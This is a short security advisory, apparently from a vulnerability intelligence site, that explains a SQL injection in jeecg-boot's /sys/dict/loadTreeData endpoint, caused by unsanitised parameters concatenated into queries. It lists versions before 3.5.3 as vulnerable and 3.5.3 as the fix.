-
CVSS Score
-Basic Information
Technical Details
Vulnerability Intelligence
Miggo AI
Miggo AIMiggo AIMiggo AIRoot Cause AnalysisThe vulnerability exists in the endpoint handling /sys/dict/loadTreeData, which maps to the loadTreeData method. The commit diff shows added security checks (dictQueryBlackListHandler.isPass()) for the constructed dictCode parameter, indicating the previous implementation lacked proper input validation. The SQL injection occurs through concatenation of user-controlled parameters (tbname, text, code, condition) into SQL queries. The title parameter from the request maps to the 'text' variable in the vulnerable code path.
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| org.jeecgframework.boot:jeecg-boot-common | maven | < 3.5.3 | 3.5.3 |
Ongoing coverage of React2Shell